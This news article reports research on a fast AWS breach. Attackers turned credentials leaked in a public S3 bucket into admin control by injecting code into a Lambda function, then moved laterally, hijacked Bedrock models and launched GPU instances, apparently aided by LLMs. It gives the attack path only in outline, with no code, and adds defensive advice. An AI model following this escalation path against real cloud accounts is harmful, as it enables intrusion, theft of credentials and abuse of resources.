Threat actors tore through an Amazon Web Services environment in under eight minutes, chaining together credential theft, privilege escalation, lateral movement, and GPU resource abuse with the help of large language models, an attack so fast that defenders had virtually no time to react.
According to new findings from Sysdig’s Threat Research Team, the intruders turned a single exposed credential in a public S3 bucket into full administrative control, demonstrating how AI‑assisted automation has collapsed the cloud attack lifecycle from hours to mere minutes.
The operation, observed in November 2025, reportedly combined a cloud misconfiguration with large language models (LLMs) to compress the entire attack lifecycle.
“The cybersecurity world today is brand new,” said Ram Varadarajan, CEO at Acalvio. “In this threat environment, organizations have to accept that the speed of the breach has shifted from days to minutes. Autonomous intruders can now escalate from initial access to full administrative control in minutes.” Defending against this class of attacks, he added, demands “AI-focused technology” that can reason and respond at the same speed as automated attackers.”
Public Buckets to privilege escalation in minutes
The compromise began with valid AWS credentials left exposed in public S3 buckets. Those buckets contained AI-related data, and the associated IAM user had permissions to interact with Lambda and limited access to Amazon Bedrock. “This user was likely intentionally created by the victim organization to automate Bedrock tasks with Lambda functions across the environment,” Sysdig researchers said in a blog post shared with CSO ahead of its publication on Tuesday.
With read access across the environment, the attacker rapidly enumerated AWS services, then escalated privileges by modifying an existing Lambda function. By injecting malicious code into a function that already had an overly permissive execution role, the attacker was able to create new access keys for an administrative user and retrieve them directly from the Lambda execution output.
Jason Soroko, senior fellow at Sectigo, said the root cause was depressingly familiar. “We must look past the novelty of AI assistance to recognize the mundane error that enabled it,” he said. “The entire compromise began because the victim left valid credentials exposed in public S3 buckets. This failure represents a stubborn refusal to master security fundamentals.”
The Lambda code showed signs of LLM generation, including comprehensive exception handling, iterative targeting logic, and even non-English comments.
Lateral movement, LLMjacking, and GPU abuse
Once administrative access was obtained, the attacker moved laterally across 19 distinct AWS principals, assuming multiple roles and creating new users to spread activity across identities. This approach enabled persistence and complicated detection, the researchers noted.
The attackers then shifted focus to Amazon Bedrock, enumerating available models and confirming that model invocation logging was disabled. The researchers said multiple foundation models were invoked, a pattern consistent with “LLMjacking”.
Then, the operation escalated into resource abuse. After preparing keys and security groups, the attackers attempted to initiate high-end GPU instances for machine learning workloads. While most powerful instances failed due to capacity limits, a costly GPU instance was eventually launched, with scripts to install CUDA, deploy training frameworks, and expose a public JupyterLab interface.
Some of the code was found referencing nonexistent repositories and resources, which Sysdig researchers attributed to LLM hallucinations.
Experts argue that the most unsettling takeaway isn’t that AI introduced a new attack technique. It is that AI removed hesitation.“When you strip this attack down to its essentials, what stands out isn’t a breakthrough technique,” said Shane Barney, CISO at Keeper Security. “It’s how little resistance the environment offered once the attacker obtained legitimate access.” He warned that AI collapses reconnaissance, privilege testing, and lateral movement into “a single, rapid sequence,” eliminating the buffer time defenders have historically relied on.
To reduce exposure, Sysdig researchers advised enforcing least privilege across IAM users, roles, and Lambda execution roles, tightly limiting permissions such as “UpdateFunctionCode” and “PassRole”, and ensuring sensitive S3 buckets are never public. Enabling Lambda versioning, turning on Amazon Bedrock model invocation logging, and monitoring for large-scale enumeration activity are also critical, they added.